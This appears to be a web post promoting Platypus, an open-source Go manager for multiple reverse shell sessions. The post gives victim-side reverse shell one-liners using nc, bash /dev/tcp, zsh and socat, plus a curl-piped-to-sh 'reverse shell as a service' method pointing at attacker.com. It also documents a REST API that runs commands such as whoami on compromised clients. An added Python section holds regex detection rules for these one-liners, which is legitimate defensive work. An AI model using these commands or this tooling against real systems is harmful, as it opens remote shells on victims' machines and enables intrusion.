Platypus - A Modern Multiple Reverse Shell Sessions Manager Written In Go


A modern terminal-based manager for multiple reverse shell sessions/clients, written in Go.

Features
  • Multiple service listening ports
  • Multiple client connections
  • RESTful API
  • Reverse shell as a service

Network Topology
Attacker IP: 192.168.1.2
    Reverse Shell Service: 0.0.0.0:8080
    RESTful Service: 127.0.0.1:9090
Victim IP: 192.168.1.3

Run Platypus from source code
go get github.com/WangYihang/Platypus
cd go/src/github.com/WangYihang/Platypus
go run platypus.go

Run Platypus from release binaries
// Download binary from https://github.com/WangYihang/Platypus/releases
chmod +x ./Platypus_linux_amd64
./Platypus_linux_amd64

Victim side
nc -e /bin/bash 192.168.1.2 8080
bash -c 'bash -i >/dev/tcp/192.168.1.2/8080 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.2 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.2:8080  

Reverse shell as a Service
// Platypus can multiplex the reverse shell listening port
// Port 8080 can receive reverse shell client connections
// There is also a "reverse shell as a service" HTTP endpoint running on the same port

// victim will be redirected to attacker-host attacker-port
// sh -c "$(curl http://host:port/attacker-host/attacker-port)"
# curl http://192.168.1.2:8080/attacker.com/1337
bash -c 'bash -i >/dev/tcp/attacker.com/1337 0>&1'
# sh -c "$(curl http://192.168.1.2:8080/attacker.com/1337)"

// If the attacker info is not specified, the host and port of the request are used as attacker-host and attacker-port
// sh -c "$(curl http://host:port/)"
# curl http://192.168.1.2:8080/
curl http://192.168.1.2:8080/192.168.1.2/8080|sh
# sh -c "$(curl http://host:port/)"
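
Detection logic for the client-side one-liners listed under "Victim side" and the curl-delivered variant under "Reverse shell as a Service" (added example, not part of Platypus or the original post). The rule names, the `host pid cmdline` record layout and the sample records are assumptions constructed for illustration.

```python
import re

# Rules derived from the client one-liners shown on this page.
# Rule names and the log record layout are assumptions of this example.
RULES = {
    "nc-exec-shell": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S*sh\b"),
    "dev-tcp-redirect": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    "zsh-ztcp": re.compile(r"zmodload\s+zsh/net/tcp|\bztcp\s+\S+\s+\d+"),
    "socat-exec-tcp": re.compile(r"\bsocat\b.*\bexec:.*\btcp:[^\s:]+:\d+", re.I),
    "curl-to-shell": re.compile(
        r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b"          # curl ... | sh
        r"|\b(?:ba|z)?sh\s+-c\s+\"?\$\(curl\b"      # sh -c "$(curl ...)"
    ),
}


def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(log_lines):
    """Parse 'host pid cmdline' records; return (host, pid, hits) per match."""
    alerts = []
    for line in log_lines:
        parts = line.strip().split(None, 2)
        if len(parts) < 3:          # skip blank or truncated records
            continue
        host, pid, cmdline = parts
        hits = classify(cmdline)
        if hits:
            alerts.append((host, pid, hits))
    return alerts


# Constructed sample records (host, pid, command line); not real telemetry.
SAMPLE = [
    "web01 4101 nc -e /bin/bash 192.168.1.2 8080",
    "web01 4102 bash -c 'bash -i >/dev/tcp/192.168.1.2/8080 0>&1'",
    "web01 4103 sh -c \"$(curl http://192.168.1.2:8080/)\"",
    "web01 4104 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.2:8080",
    "web01 4105 curl -fsS https://example.org/healthz",
    "web01 4106 nc -zv 10.0.0.5 443",
]

if __name__ == "__main__":
    for host, pid, hits in scan(SAMPLE):
        print(f"{host} pid={pid} matched={','.join(hits)}")
```

The `dev-tcp-redirect` rule also matches legitimate `/dev/tcp` port probes in health-check scripts, so correlate it with the parent process and destination address before alerting.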

RESTful API
  • GET /client List all online clients
# curl 'http://127.0.0.1:9090/client'
{
    "msg": [
        "192.168.1.3:54798"
    ],
    "status": true
}
  • POST /client/:hash execute a command on a specific client
# curl -X POST 'http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4' --data 'cmd=whoami'
{
    "status": true,
    "msg": "root\n"
}
  • How to hash?
# echo -n "192.168.1.3:54798" | md5sum
0723c3bed0d0240140e10a6ffd36eed4  -
